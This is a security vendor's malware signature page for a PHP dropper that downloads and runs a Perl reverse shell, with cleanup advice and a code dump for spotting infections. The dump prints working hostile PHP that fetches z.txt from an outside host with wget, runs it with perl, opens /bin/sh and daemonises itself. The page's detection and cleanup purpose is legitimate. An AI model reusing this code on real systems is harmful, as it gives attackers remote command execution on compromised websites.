Malware Signatures

  1. Home
  2. Malware Signatures
  3. php.dropper.reverse_shell.001

php.dropper.reverse_shell.001

Droppers are specially crafted PHP scripts which payload is to download (drop) a second malicious file and execute it. The dropped file can be a backdoor, hacktool, defacement or spam-seo related malware.
This PHP code execute several system commands to download and run a reverse shell programmed on perl.
Reverse shells are programs that connect back to a server allowing remote command execution.

Affecting

Any vulnerable website. Outdated software or compromised passwords can act as an infection vector.

Cleanup

Cleanup is done by deleting the malicious code inside the file or replacing it with a fresh version. The infection can be found in your system by searching for parts of the dump below inside your site's files and also checking for unknown daemonised perl process.
You can also sign up with us and let our team remove the malware for you.

Dump


<?php
set_time_limit (0);
$VERSION = "1.0";
$ip = getenv ('REMOTE_ADDR'); //
$port = 443; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'wget http://www.sorgulatr.com/z.txt; perl z.txt; /bin/sh -i';
$daemon = 0;
$debug = 0;

//
// Daemonise ourself if possible to avoid zombies later
//

// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies. Worth a try...
if (function_exists('pcntl_fork')) {
// Fork and have the parent process exit
$pid = pcntl_fork();

if ($pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}

if ($pid) {
exit(0); // Parent exits
}

// Make the current process a session leader
// Will only succeed if we forked
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}

$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");